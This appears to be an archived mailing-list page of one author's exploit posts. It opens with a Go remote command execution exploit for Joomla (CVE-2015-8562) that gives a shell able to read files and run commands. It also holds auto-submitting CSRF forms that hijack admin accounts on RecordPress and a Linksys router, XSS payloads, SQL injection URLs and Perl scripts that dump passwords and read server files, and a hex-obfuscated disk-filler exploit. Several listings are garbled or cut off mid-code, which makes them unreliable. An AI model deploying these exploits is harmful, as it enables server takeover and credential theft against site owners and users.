Joomla 1.5.x to 3.4.5 Object Injection Exploit (golang)

2015-12-31 Thread irancrash
package main

/*
**
* Exploit Title: Joomla 1.5.x to 3.4.5 Object Injection Exploit
* Exploit Author: Khashayar Fereidani ( http://fereidani.com )
* Version: 1.5.x to 3.4.5
* CVE : CVE-2015-8562
**
* THIS EXPLOIT IS PUBLISHED ONLY FOR EDUCATIONAL PURPOSES; ANY ILLEGAL USAGE
* IS YOUR OWN RESPONSIBILITY
**
* How to run : (you need golang compiler from golang.org)
* go run exploit.go http://target/path
* or
* go build exploit.go
* ./exploit http://target/path
**
* DEMO :

$ ./exploit 192.168.1.113/joomla
###
# Joomla Remote Command Execution 0day Exploit
# Exploited by: Khashayar Fereidani
# http://fereidani.com
# Vulnerable Versions: 1.5.x to 3.4.5
###

Attacking to  http://FILTERED.TLD/joomla/
Target is vulnerable !
# Command Line Documentation :
read FILEPATH   read file from FILEPATH
dir DIRPATH list directory in DIRPATH
exec COMMANDexecute system command
eval phpcodeevaluate PHP Code
helpdisplay this help
exitclose exploit console

[*] Examples:
read /etc/passwd
dir /etc/
exec ls -lah
eval include('/etc/passwd')


root@joomla:$ exec uname -a
Linux vm2.local 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 
UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
root@joomla:$

 */

import (
"fmt"
"net/http"
"regexp"
"os"
"io/ioutil"
"bytes"
"net/http/cookiejar"
"net/url"
"bufio"
"strings"
)


// Package-level state shared by the request helpers in this file.
var (
	// target is the URL that newRequest POSTs to.
	target string

	// helpString is the help text listing the supported console commands
	// and a few usage examples.
	helpString = `# Command Line Documentation :
read FILEPATH   read file from FILEPATH
dir DIRPATH list directory in DIRPATH
exec COMMANDexecute system command
eval phpcodeevaluate PHP Code
helpdisplay this help
exitclose exploit console

[*] Examples:
read /etc/passwd
dir /etc/
exec ls -lah
eval include('/etc/passwd')

`

	// validHttpUrl matches text that starts with http:// or https://.
	validHttpUrl = regexp.MustCompile("^http[s]{0,1}://")

	// resultRegex captures everything that follows the "iMH3r3=" marker in a
	// response body; the (?s) flag lets the capture span newlines.
	resultRegex = regexp.MustCompile("(?sm)iMH3r3=(.*)")

	// cmdRegex captures a leading word, one whitespace character, and the
	// remainder of the line. Presumably applied to console input; its use is
	// outside this block.
	cmdRegex = regexp.MustCompile("(\\w+)\\s(.+)")

	// newLine matches a single carriage return or line feed.
	newLine = regexp.MustCompile("[\\n\\r]")

	// client is the HTTP client used by runCommand and confirm. It is nil
	// until assigned elsewhere in the file.
	client *http.Client
)

// newRequest builds the POST request this tool sends to target; the file
// header names the issue as CVE-2015-8562 (Joomla 1.5.x to 3.4.5).
//
// command is concatenated, unescaped, into the form field named "1", after an
// echo of the marker "iMH3r3=" that resultRegex later looks for in the
// response. The User-Agent header is set to a fixed string that contains a
// serialized PHP object followed by four raw bytes.
//
// It panics if http.NewRequest returns an error.
//
// NOTE(review): for detection, the artefacts visible in this request are a
// User-Agent header carrying PHP serialization syntax (O:<len>:"Class":...,
// the "}__" prefix, class names such as JDatabaseDriverMysqli and SimplePie)
// and a POST body with a field named "1". Alerting on serialized-object
// markers in request headers, and running a Joomla release newer than the
// affected range given in the file header, are the relevant mitigations.
func newRequest(command string) *http.Request{
values:=url.Values{}
// Form field "1" carries the marker echo followed by the caller's command.
values.Set("1","echo('iMH3r3=');"+command+";")


req,err:=http.NewRequest("POST",target,bytes.NewBufferString(values.Encode()))

if err!=nil{
panic(err)
}


// Fixed header value: a serialized object string plus four trailing bytes.
// The role of the trailing bytes is not evident from this block.
req.Header.Set("User-Agent",`123}__test|O:21:"JDatabaseDriverMysqli":3:{s:4:"\0\0\0a";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:6:"assert";s:10:"javascript";i:;s:8:"feed_url";s:43:"eval($_POST[1]);JFactory::getConfig();exit;";}i:1;s:4:"init";}}s:13:"\0\0\0connection";i:1;}`+"\xf0\xfd\xfd\xfd")
req.Header.Add("Content-Type", "application/x-www-form-urlencoded")
return req
}


// escape returns str with every single quote preceded by a backslash.
// No other character is changed; in particular, backslashes already present
// in str are left as they are.
func escape(str string) string {
	const (
		quote   = "'"
		escaped = "\\'"
	)
	// Splitting on the quote and re-joining with the escaped form replaces
	// every occurrence, including adjacent ones.
	pieces := strings.Split(str, quote)
	return strings.Join(pieces, escaped)
}


// runCommand sends the request built by newRequest(command) through the shared
// client and prints whatever follows the "iMH3r3=" marker in the response body.
//
// A transport error is printed and ends the call. A body read error is printed
// too, but the bytes read so far are still searched for the marker. Nothing is
// printed when the marker is absent.
func runCommand(command string) {
	resp, err := client.Do(newRequest(command))
	if err != nil {
		fmt.Println(err.Error())
		return
	}
	defer resp.Body.Close()

	body, readErr := ioutil.ReadAll(resp.Body)
	if readErr != nil {
		fmt.Println(readErr)
	}

	// Group 1 of resultRegex is the text after the 7-byte marker, i.e. the
	// same bytes as the full match with the marker sliced off.
	if groups := resultRegex.FindStringSubmatch(string(body)); len(groups) > 0 {
		fmt.Print(groups[1])
	}
}


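// confirm sends a request with an empty command and reports whether the
// response body contains the "iMH3r3=" marker matched by resultRegex.
//
// It returns false when the request fails, when the server answers with
// status 500 (reported on stdout as a patched PHP version), or when the marker
// is absent. The response body is closed on every return path, including the
// status-500 one.
func confirm() bool {
	res, err := client.Do(newRequest(""))
	if err != nil {
		fmt.Println(err)
		return false
	}
	// Register the close before any early return so the connection is
	// released even when the status check below bails out.
	defer res.Body.Close()

	if res.StatusCode == 500 {
		fmt.Println("Patched PHP Version :( !")
		return false
	}

	resBytes, err := ioutil.ReadAll(res.Body)
	if err != nil {
		// The read error is reported, and the bytes read so far are still
		// checked for the marker.
		fmt.Println(err)
	}
	return resultRegex.MatchString(string(resBytes))
}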

func main(){
fmt.Print(`###
# Joomla Remote Command Execution 0day Exploit
# 

RecordPress Multiple Vulnerabilities

2011-03-09 Thread irancrash

WebApplication : RecordPress 0.3.1
Type of vulnerability : CSRF ( Change Admin Password ) And XSS
Risk of use : Medium

Producer Website : http://www.recordpress.org/

Discovered by : Khashayar Fereidanis
Team Website : http://IRCRASH.COM
Team Members : Khashayar Fereidani - Sina YazdanMehr - Arash Allebrahim
English Forums : Http://IRCRASH.COM/forums/
Email : irancrash [ a t ] gmail [ d o t ] com
Facebook : http://facebook.com/fereidani


CSRF For Change Admin Password :

html
head/head
body onLoad=javascript:document.form.submit()

form action=http://examplesite/admin/rp-settings-users-edit-db.php?id=1;;

method=POST name=form

input type=hidden name=formusername value=admin

input type=hidden name=formname value=admin

input type=hidden name=formemail value=em...@pwnedpwnedpwned.sss

input type=hidden name=formpass value=password

input type=hidden name=formpass2 value=password

input type=hidden name=formadminstatus value=2

input type=hidden name=rp-settings-users-edit-db value=Confirm+%BB


/form
/body
/html



Cross Site Scripting Vulnerabilities :

http://examplesite/header.php?row[titledesc]=scriptalert(123)/script
http://examplesite/admin/rp-menu.php?_SESSION[sess_user]=scriptalert(123)/script


Linksys Cisco Wag120N CSRF Vulnerability

2011-02-25 Thread irancrash

Hardware : Linksys Cisco Wag120n(And perhaps similar versions)
Type of vulnerability : CSRF ( Change Admin Password And Add User )
Risk of use : High

Producer Website : http://linksysbycisco.com

Discovered by : Khashayar Fereidani
Team Website : Http://IRCRASH.COM
Team Members : Khashayar Fereidani - Sina YazdanMehr - Arash Allebrahim
English Forums : Http://IRCRASH.COM/forums/
Email : irancrash [ a t ] gmail [ d o t ] com


CSRF For Change Admin Password :
#Use sysPasswd and sysConfirmPasswd to set new password

html
head/head
body onLoad=javascript:document.form.submit()

form action=http://192.168.1.1/setup.cgi;;

method=POST name=form

input type=hidden name=user_list value=1

input type=hidden name=h_user_list value=1

input type=hidden name=sysname value=admin

input type=hidden name=sysPasswd value=password

input type=hidden name=sysConfirmPasswd value=password

input type=hidden name=remote_management value=enable
input type=hidden name=http_wanport value=8080

input type=hidden name=upnp_enable value=enable

input type=hidden name=wlan_enable value=enable

input type=hidden name=igmp_proxy_enable value=enable

input type=hidden name=save value=Save+Settings

input type=hidden name=h_pwset value=yes

input type=hidden name=sysname_changed value=yes

input type=hidden name=pwchanged value=yes

input type=hidden name=pass_is_default value=false

input type=hidden name=h_remote_management value=enable

input type=hidden name=pass_is_none value=no

input type=hidden name=h_upnp_enable value=enable

input type=hidden name=h_wlan_enable value=enable

input type=hidden name=h_igmp_proxy_enable value=enable

input type=hidden name=todo value=save

input type=hidden name=this_file value=Administration.htm

input type=hidden name=next_file value=Administration.htm

input type=hidden name=message value=

input type=hidden name=h_wps_cur_status value=



/form
/body
/html



CSRF For Add Administrator User:
#Use sysPasswd and sysConfirmPasswd to set new password
#if you add new user you should set pass_is_none=yes

html
head/head
body onLoad=javascript:document.form.submit()

form action=http://192.168.1.1/setup.cgi;;

method=POST name=form

input type=hidden name=user_list value=2

input type=hidden name=h_user_list value=2

input type=hidden name=sysname value=ircrash

input type=hidden name=sysPasswd value=password

input type=hidden name=sysConfirmPasswd value=password

input type=hidden name=remote_management value=enable
input type=hidden name=http_wanport value=8080

input type=hidden name=upnp_enable value=enable

input type=hidden name=wlan_enable value=enable

input type=hidden name=igmp_proxy_enable value=enable

input type=hidden name=save value=Save+Settings

input type=hidden name=h_pwset value=yes

input type=hidden name=sysname_changed value=yes

input type=hidden name=pwchanged value=yes

input type=hidden name=pass_is_default value=false

input type=hidden name=h_remote_management value=enable

input type=hidden name=pass_is_none value=yes

input type=hidden name=h_upnp_enable value=enable

input type=hidden name=h_wlan_enable value=enable

input type=hidden name=h_igmp_proxy_enable value=enable

input type=hidden name=todo value=save

input type=hidden name=this_file value=Administration.htm

input type=hidden name=next_file value=Administration.htm

input type=hidden name=message value=

input type=hidden name=h_wps_cur_status value=



/form
/body
/html




SMF (Simple Machine Forum) 1.1.11 XSS - Discovered by : Khashayar Fereidani

2009-12-21 Thread irancrash

|| Script : SMF (Simple Machine Forum) 1.1.11
|| Vulnerability Type : Active XSS ( Active Cross Site Scripting )
|| Risk : Low

|| Discovered By Khashayar Fereidani
|| http://ircrash.com http://bugtraq.ircrash.com


|| Note :

For use this vulnerability you need access to censor words panel .
1.First login and go to : 
http://site/path/index.php?action=postsettings;sa=censor
click on Click here to add another word. for add new row .
set new text box : ircrash = scriptalert('Vulnerable')/script
and save page .
2.Open new topic and set title : ircrash , fill all fields and post topic .
3.Open forum home page . you see alert : Vulnerable

Any HTML or JavaScript code can be set this way . An attacker could deface the forum home page or 
serve a malicious ActiveX control .

|| Solution : filter censor page variables with htmlspecialchars .
|| Tnx : Only For God


COMRaider Idefense Labs CreateFolder() and Copy() Insecure Method (Hard Disk Filler Exploit)

2009-07-17 Thread irancrash
#!/usr/bin/perl

###

# COMRaider Idefense Labs CreateFolder() and Copy() Insecure Method (Hard Disk 
Filler Exploit)

#

# Discovered and Exploited by : Khashayar Fereidani

# Http://IRCRASH.com  Http://Fereidani.ir

# 

###

# Help :

#  perl comraider.pl

#  Please enter the foldername (C:\ircrash\ for example) : C:\ircrash\

#  Please enter number of copy cmd to folder (1 or more for example) : 1

#  ** Ok comraider.html created , now you can use this

###

# Tnx : Only for God

###

$cmd = 'C:\WINDOWS\system32\cmd.exe';



print 'Please enter the foldername (C:\ircrash\ for example) : ';

$folder =  stdin;

print Please enter number of copy cmd to folder (1 or more for example) : 
;

$number = stdin;

chomp $number;

chomp $folder;



$shellcode = 
chr(0x3C).chr(0x48).chr(0x54).chr(0x4D).chr(0x4C).chr(0x3E).chr(0xD).chr(0xA).chr(0x3C).chr(0x21).chr(0x2D).chr(0x2D).chr(0xD).chr(0xA).chr(0x43).chr(0x4F).chr(0x4D).chr(0x52).chr(0x61).chr(0x69).chr(0x64).chr(0x65).chr(0x72).chr(0x20).chr(0x49).chr(0x64).chr(0x65).chr(0x66).chr(0x65).chr(0x6E).chr(0x73).chr(0x65).chr(0x20).chr(0x4C).chr(0x61).chr(0x62).chr(0x73).chr(0x20).chr(0x43).chr(0x72).chr(0x65).chr(0x61).chr(0x74).chr(0x65).chr(0x46).chr(0x6F).chr(0x6C).chr(0x64).chr(0x65).chr(0x72).chr(0x28).chr(0x29).chr(0x20).chr(0x61).chr(0x6E).chr(0x64).chr(0x20).chr(0x43).chr(0x6F).chr(0x70).chr(0x79).chr(0x28).chr(0x29).chr(0x20).chr(0x49).chr(0x6E).chr(0x73).chr(0x65).chr(0x63).chr(0x75).chr(0x72).chr(0x65).chr(0x20).chr(0x4D).chr(0x65).chr(0x74).chr(0x68).chr(0x6F).chr(0x64).chr(0x20).chr(0x45).chr(0x78).chr(0x70).chr(0x6C).chr(0x6F).chr(0x69).chr(0x74).chr(0xD).chr(0xA).chr(0x44).chr(0x69).chr(0x73).chr(0x63).chr(0x6F).chr(0x76).chr(0x65).chr(0x72).chr(0x65).chr
 
(0x64).chr(0x20).chr(0x62).chr(0x79).chr(0x20).chr(0x3A).chr(0x20).chr(0x4B).chr(0x68).chr(0x61).chr(0x73).chr(0x68).chr(0x61).chr(0x79).chr(0x61).chr(0x72).chr(0x20).chr(0x46).chr(0x65).chr(0x72).chr(0x65).chr(0x69).chr(0x64).chr(0x61).chr(0x6E).chr(0x69).chr(0xD).chr(0xA).chr(0x68).chr(0x74).chr(0x74).chr(0x70).chr(0x3A).chr(0x2F).chr(0x2F).chr(0x66).chr(0x65).chr(0x72).chr(0x65).chr(0x69).chr(0x64).chr(0x61).chr(0x6E).chr(0x69).chr(0x2E).chr(0x69).chr(0x72).chr(0x20).chr(0x26).chr(0x20).chr(0x68).chr(0x74).chr(0x74).chr(0x70).chr(0x3A).chr(0x2F).chr(0x2F).chr(0x69).chr(0x72).chr(0x63).chr(0x72).chr(0x61).chr(0x73).chr(0x68).chr(0x2E).chr(0x63).chr(0x6F).chr(0x6D).chr(0xD).chr(0xA).chr(0x2D).chr(0x2D).chr(0x3E).chr(0xD).chr(0xA).chr(0xD).chr(0xA).chr(0x3C).chr(0x6F).chr(0x62).chr(0x6A).chr(0x65).chr(0x63).chr(0x74).chr(0x20).chr(0x63).chr(0x6C).chr(0x61).chr(0x73).chr(0x73).chr(0x69).chr(0x64).chr(0x3D).chr(0x27).chr(0x63).chr(0x6C).chr(0x73).chr(0x69).chr(0x64).chr(0x3A).
 
chr(0x39).chr(0x41).chr(0x30).chr(0x37).chr(0x37).chr(0x44).chr(0x30).chr(0x44).chr(0x2D).chr(0x42).chr(0x34).chr(0x41).chr(0x36).chr(0x2D).chr(0x34).chr(0x45).chr(0x43).chr(0x30).chr(0x2D).chr(0x42).chr(0x36).chr(0x43).chr(0x46).chr(0x2D).chr(0x39).chr(0x38).chr(0x35).chr(0x32).chr(0x36).chr(0x44).chr(0x46).chr(0x35).chr(0x38).chr(0x39).chr(0x45).chr(0x34).chr(0x27).chr(0x20).chr(0x69).chr(0x64).chr(0x3D).chr(0x27).chr(0x74).chr(0x61).chr(0x72).chr(0x67).chr(0x65).chr(0x74).chr(0x27).chr(0x3E).chr(0x3C).chr(0x2F).chr(0x6F).chr(0x62).chr(0x6A).chr(0x65).chr(0x63).chr(0x74).chr(0x3E).chr(0xD).chr(0xA).chr(0xD).chr(0xA).chr(0x3C).chr(0x73).chr(0x63).chr(0x72).chr(0x69).chr(0x70).chr(0x74).chr(0x20).chr(0x6C).chr(0x61).chr(0x6E).chr(0x67).chr(0x75).chr(0x61).chr(0x67).chr(0x65).chr(0x3D).chr(0x27).chr(0x76).chr(0x62).chr(0x73).chr(0x63).chr(0x72).chr(0x69).chr(0x70).chr(0x74).chr(0x27).chr(0x3E).chr(0xD).chr(0xA).chr(0x61).chr(0x72).chr(0x67).chr(0x66).chr(0x3D).chr(0x22).$fold
 
er.chr(0x22).chr(0xD).chr(0xA).chr(0x74).chr(0x61).chr(0x72).chr(0x67).chr(0x65).chr(0x74).chr(0x2E).chr(0x43).chr(0x72).chr(0x65).chr(0x61).chr(0x74).chr(0x65).chr(0x46).chr(0x6F).chr(0x6C).chr(0x64).chr(0x65).chr(0x72).chr(0x20).chr(0x61).chr(0x72).chr(0x67).chr(0x66).chr(0xD).chr(0xA).chr(0x6E).chr(0x75).chr(0x6D).chr(0x62).chr(0x65).chr(0x72).chr(0x31).chr(0x20).chr(0x3D).chr(0x20).chr(0x30).chr(0xD).chr(0xA).chr(0x6E).chr(0x75).chr(0x6D).chr(0x62).chr(0x65).chr(0x72).chr(0x32).chr(0x20).chr(0x3D).chr(0x20).$number.chr(0xD).chr(0xA).chr(0x77).chr(0x68).chr(0x69).chr(0x6C).chr(0x65).chr(0x20).chr(0x28).chr(0x6E).chr(0x75).chr(0x6D).chr(0x62).chr(0x65).chr(0x72).chr(0x31).chr(0x20).chr(0x3C).chr(0x20).chr(0x6E).chr(0x75).chr(0x6D).chr(0x62).chr(0x65).chr(0x72).chr(0x32).chr(0x29).chr(0xD).chr(0xA).chr(0x6E).chr(0x75).chr(0x6D).chr(0x62).chr(0x65).chr(0x72).chr(0x31).chr(0x20).chr(0x3D).chr(0x20).chr(0x6E).chr(0x75).chr(0x6D).chr(0x62).chr(0x65).chr(0x72).chr(0x31).chr(0x20
 

PHP-Fusion Mod vArcade 1.8 Sql Injection Vulnerability

2009-01-08 Thread irancrash


Script : PHP-Fusion Mod vArcade 1.8

Type : Sql Injection Vulnerability

Risk : High



Download From : http://venue.nu/



Discovered by : Khashayar Fereidani

My Official Website : HTTP://FEREIDANI.IR

Our Team Website : Http://IRCRASH.COM

Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com



Sql Injection Vulnerability :

Vulnerable address : 
http://[host]/[path]/infusions/varcade/callcomments.php?comment_id=%27+union+select+0,user_name,2,3,4,5,6,user_password+from+fusion_users+where+user_id=1/*

Google Dark : inurl:/infusions/varcade/



Tnx : God

  HTTP://IRCRASH.COM HTTP://FEREIDANI.IR




Re: Re: Cpanel 11.x Local File Inclusion Cross Site Scripting - Discovered By Khashayar Fereidani

2008-11-20 Thread irancrash
Hi ,



An attacker can bypass disable_functions , mod_security , safe_mode ... with 
this vulnerability .



I think this is good reason !







http://fereidani.ir - Khashayar Fereidani


Cpanel 11.x Local File Inclusion Cross Site Scripting - Discovered By Khashayar Fereidani

2008-10-31 Thread irancrash


Script : Cpanel 11.x

Type : Local File Inclusion  Cross Site Scripting

Risk : High



Discovered by : Khashayar Fereidani

 I am 17 Years Old 

My Official Website : HTTP://FEREIDANI.IR

Team Website : Http://IRCRASH.COM

Team Members : Khashayar Fereidani - Hadi Kiamarsi - Sina YazdanMehr

Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com



Local File Inclusion Vulnerability :

Note : Rename your shell to config.php and upload with your ftp account in ./ 
directory  , now login in cpanel and
   enter vulnerable address in url 


https://ServerIp:2083/frontend/x3/fantastico/autoinstall4imagesgalleryupgrade.php?action=GoAheadscriptpath_show=/home/[youruser]/

https://ServerIp:2083/frontend/x2/fantastico/autoinstall4imagesgalleryupgrade.php?action=GoAheadscriptpath_show=/home/[youruser]/

https://ServerIp:2083/frontend/x/fantastico/autoinstall4imagesgalleryupgrade.php?action=GoAheadscriptpath_show=/home/[youruser]/



Cross site scripting :

File Address : 
frontend/x3/fantastico/autoinstall4imagesgalleryupgrade.php?action=Upgrade%20to%201.7.4

Set Action as Upgrade%20to%201.7.4

Vulnerable Variables :

$localapp
$updatedir
$scriptpath_show
$domain_show
$thispage
$thisapp
$currentversion

For Example : 
https://ServerIp:2083/frontend/x3/fantastico/autoinstall4imagesgalleryupgrade.php?action=Upgrade%20to%201.7.4localapp=%22%3Cscript%3Ealert(%27xss%27)%3C/script%3E




Tnx : God

  HTTP://IRCRASH.COM HTTP://FEREIDANI.IR




Ezphotogallery 2.1 Multiple Vulnerabilities ( Xss/Login Bypass/Sql injection Exploit/File Disclosure)

2008-09-11 Thread irancrash
#!/usr/bin/perl
#
#
#Script : Ezphotogallery 2.1
#
#Type : Multiple Vulnerabilities ( Xss/Login Bypass/Sql injection Exploit/File 
Disclosure)
#
#Method : GET
#
#Alert : High
#
#Google Dork : 100% | 50% | 25% Back to gallery inurl:show.php?imageid=
#
#
#
#Discovered by : Khashayar Fereidani a.k.a. Dr.Crash
#
#My Official Website : HTTP://FEREIDANI.IR
#
#Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t] com
#
#
#
#Khashayar Fereidani Official Website : HTTP://FEREIDANI.IR
#
#
#
#Script Download :  
http://heanet.dl.sourceforge.net/sourceforge/ezphotogallery/ezphotogallery-2.1.zip
#
#
#Xss Vulnerabilities :
#
#Xss 1 : gallery.php?galleryid=scriptalert(document.cookie)/script
#Xss 2 : 
show.php?imageid=156size=''?''scriptalert(document.cookie)/script
#Xss 3 : show.php?imageid=scriptalert(document.cookie)/script
#
#
#Login Bypass :
#
#Insert in gallery.php
#
#User : admin ' or ' 1=1
#Password : Dr.Crash
#
#
#Sql Injection :
#
#Injection 1 : show.php?imageid=sql
#
#
#Tnx : God
#
# HTTP://IRCRASH.COM
#
#

use LWP;
use HTTP::Request;
use Getopt::Long;
 
 
$scriptname=Ezphotogallery 2.1;

sub header
{
print 

* $scriptname

*Discovered by : Khashayar Fereidani   *
*Exploited by : Khashayar Fereidani*
*My Official Website : http://fereidani.ir *
;
}
 
sub usage
{
  print 
* Usage : perl $0 http://Example/

;
}   
   
 

$url = ($ARGV[0]);

if(!$url)
{
header();
usage();
exit;
}
if($url !~ /\//){$url = $url./;}
if($url !~ /http:\/\//){$url = http://.$url;}
# xpl1: sends one request to show.php with a UNION SELECT placed in the imageid
# parameter, then prints the name and password values found in the response
# between the Login:/enduser and Password:/endpass markers.
# NOTE(review): this listing appears to have lost quote characters and "->"
# arrows in extraction; it is not valid Perl as shown.
# NOTE(review): for defenders, the fix on the application side is to treat
# imageid as an integer / bound parameter in show.php. Requests whose imageid
# contains union+select together with the hex markers below, the fixed
# Referer IRCRASH.COM and the fixed User-Agent string are usable log signatures.
sub xpl1()
{
#concat(0x4c6f67696e3a,user,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e)
# The hex literals decode to "Login:", "<enduser>", "\r\nPassword:" and
# "<endpass>"; the split() calls further down search for these markers.
$vul = 
/show.php?imageid=999+union+select+0,1,2,concat(0x4c6f67696e3a,name,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e),4,5,6,7,8,9+from+users/*;
$requestpage = $url.$vul;

 
# $contlen and $poststring are not assigned anywhere in the lines shown.
my $req  = HTTP::Request-new(POST,$requestpage);
$ua = LWP::UserAgent-new;
$ua-agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' );
#$req-referer($url);
$req-referer(IRCRASH.COM);
$req-content_type('application/x-www-form-urlencoded');
$req-header(content-length = $contlen);
$req-content($poststring);
 
$response = $ua-request($req);
$content = $response-content;
$header = $response-headers_as_string();
 
# Keep the text between "Login:" and "enduser".
@name = split(/Login:/,$content);
$name = @name[1];
@name = split(/enduser/,$name);
$name = @name[0];
 
# Keep the text between "Password:" and "endpass".
@password = split(/Password:/,$content);
$password = @password[1];
@password = split(/endpass/,$password);
$password = @password[0];

# The operator between the two tests is missing in this listing.
if(!$name  !$password)
{
print \n\n;
print !Exploit failed ! :(\n\n;
exit;
}
 
print \n Username: .$name.\n\n;
print  Password:  .$password.\n\n;

 
}
 

#XPL2

# xpl2: asks for a file path on stdin, requests show.php with a UNION SELECT
# that wraps MySQL load_file() around that path, and writes the text found
# between the Login:/enduser markers to a local file.
# NOTE(review): this listing appears to have lost quote characters and "->"
# arrows in extraction; it is not valid Perl as shown.
# NOTE(review): for defenders, load_file() only works when the database account
# holds the FILE privilege, so removing that privilege from the application's
# account limits this path; treating imageid as an integer / bound parameter
# in show.php removes the injection itself.
sub xpl2()
{
print \n Example For File Address : /home/user/public_html/config.php\n Or 
/etc/passwd;
print \n Enter File Address :;
$fil3 = stdin;

# 0x4c6f67696e3a decodes to "Login:" and 0x3c656e64757365723e to "<enduser>".
$vul = 
/show.php?imageid=999+union+select+0,1,2,concat(0x4c6f67696e3a,load_file('$fil3'),0x3c656e64757365723e),4,5,6,7,8,9+from+users/*;
$requestpage = $url.$vul;
 
# $contlen and $poststring are not assigned anywhere in the lines shown.
my $req  = HTTP::Request-new(POST,$requestpage);
$ua = LWP::UserAgent-new;
$ua-agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' );
#$req-referer($url);
$req-referer(IRCRASH.COM);
$req-content_type('application/x-www-form-urlencoded');
$req-header(content-length = $contlen);
$req-content($poststring);
 
$response = $ua-request($req);
$content = $response-content;
$header = $response-headers_as_string();

 
# Keep the text between "Login:" and "enduser".
@name = split(/Login:/,$content);
$name = @name[1];
@name = split(/enduser/,$name);
$name = @name[0];


# $password is not assigned inside this sub; the operator between the two
# tests is missing in this listing.
if(!$name  !$password)
{
print \n\n;
print !Exploit failed ! :(\n\n;
exit;
}
 
# Writes the extracted text to a local file, then reports source.txt.
open (FILE, .source..txt);
print FILE $name;
close (FILE);
print  File Save In source.txt\n;
print ;
 
}

#XPL2 END
#Starting;
print 

* $scriptname

*Discovered by : Khashayar Fereidani   *
*Exploited by : Khashayar Fereidani*
*My Official Website : http://fereidani.ir *

* Mod Options :*
* Mod 1

PhsBlog v0.2 Bypass Sql injection Filtering Exploit

2008-09-11 Thread irancrash
#!/usr/bin/perl
#
#
#Script : PhsBlog v0.2
#
#Type : Bypass Sql injection Filtering Exploit
#
#Method : GET
#
#Risk : High
#
#
#
#Discovered by : Khashayar Fereidani a.k.a. Dr.Crash
#
#My Official Website : HTTP://FEREIDANI.IR
#
#Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t] com
#
#
#
#Khashayar Fereidani Official Website : HTTP://FEREIDANI.IR
#
#
#
#Script Download :  http://www.phsdev.com/downloads/phsblog_current.zip
#
#
#
#Tnx : God
#
# HTTP://IRCRASH.COM
#
#

use LWP;
use HTTP::Request;
use Getopt::Long;
 
 
$scriptname=PhsBlog v0.2;

sub header
{
print 

* $scriptname

*Discovered by : Khashayar Fereidani   *
*Exploited by : Khashayar Fereidani*
*My Official Website : http://fereidani.ir *
;
}
 
sub usage
{
  print 
* Usage : perl $0 http://Example/

;
}   
   
 

$url = ($ARGV[0]);

if(!$url)
{
header();
usage();
exit;
}
if($url !~ /\//){$url = $url./;}
if($url !~ /http:\/\//){$url = http://.$url;}
# xpl1: sends one request to index.php with a UNION SELECT placed in the
# sql_cid parameter, then prints the username and password values found in the
# response between the Login:/enduser and Password:/endpass markers.
# NOTE(review): this listing appears to have lost quote characters and "->"
# arrows in extraction; it is not valid Perl as shown.
# NOTE(review): for defenders, the fix on the application side is a bound
# parameter (or integer cast) for sql_cid rather than a keyword filter.
# Requests whose sql_cid contains union+select together with the hex markers
# below, the fixed Referer IRCRASH.COM and the fixed User-Agent string are
# usable log signatures.
sub xpl1()
{
#concat(0x4c6f67696e3a,user,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e)
# The hex literals decode to "Login:", "<enduser>", "\r\nPassword:" and
# "<endpass>"; the split() calls further down search for these markers.
$vul = 
/index.php?sql_cid=999'union+select+0,1,2,3,4,concat(0x4c6f67696e3a,username,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e),6,7,8,9,10,11,12+from+phsblog_users/*;
$requestpage = $url.$vul;

 
# $contlen and $poststring are not assigned anywhere in the lines shown.
my $req  = HTTP::Request-new(POST,$requestpage);
$ua = LWP::UserAgent-new;
$ua-agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' );
#$req-referer($url);
$req-referer(IRCRASH.COM);
$req-content_type('application/x-www-form-urlencoded');
$req-header(content-length = $contlen);
$req-content($poststring);
 
$response = $ua-request($req);
$content = $response-content;
$header = $response-headers_as_string();
 
# Keep the text between "Login:" and "enduser".
@name = split(/Login:/,$content);
$name = @name[1];
@name = split(/enduser/,$name);
$name = @name[0];
 
# Keep the text between "Password:" and "endpass".
@password = split(/Password:/,$content);
$password = @password[1];
@password = split(/endpass/,$password);
$password = @password[0];

# The operator between the two tests is missing in this listing.
if(!$name  !$password)
{
print \n\n;
print !Exploit failed ! :(\n\n;
exit;
}
 
print \n Username: .$name.\n\n;
print  Password:  .$password.\n\n;

 
}
 

#XPL2

# xpl2: asks for a file path on stdin, sends a request whose query string wraps
# MySQL load_file() around that path inside a UNION SELECT, and writes the text
# found between the Login:/enduser markers to a local file.
# NOTE(review): this listing appears to have lost quote characters and "->"
# arrows in extraction; it is not valid Perl as shown.
# NOTE(review): the active query string uses show/pickupsid parameters and
# mysql.user, while the commented-out line above it uses index.php?sql_cid and
# phsblog_users as xpl1 does - confirm which one applies to PhsBlog.
# NOTE(review): for defenders, load_file() only works when the database account
# holds the FILE privilege, so removing that privilege from the application's
# account limits this path; bound parameters remove the injection itself.
sub xpl2()
{
print \n Example For File Address : /home/user/public_html/config.php\n Or 
/etc/passwd;
print \n Enter File Address :;
$fil3 = stdin;
#index.php?sql_cid=999'union+select+0,1,2,3,4,concat(0x4c6f67696e3a,load_file('$fil3'),0x3c656e64757365723e),6,7,8,9,10,11,12+from+phsblog_users/*
# 0x4c6f67696e3a decodes to "Login:" and 0x3c656e64757365723e to "<enduser>".
$vul = 
?show=pickupsid=9'+union+select+0,concat(0x4c6f67696e3a,load_file('$fil3'),0x3c656e64757365723e),2,3,4,5,6,7,8,9,10,11,12,13+from+mysql.user/*;
$requestpage = $url.$vul;
 
# $contlen and $poststring are not assigned anywhere in the lines shown.
my $req  = HTTP::Request-new(POST,$requestpage);
$ua = LWP::UserAgent-new;
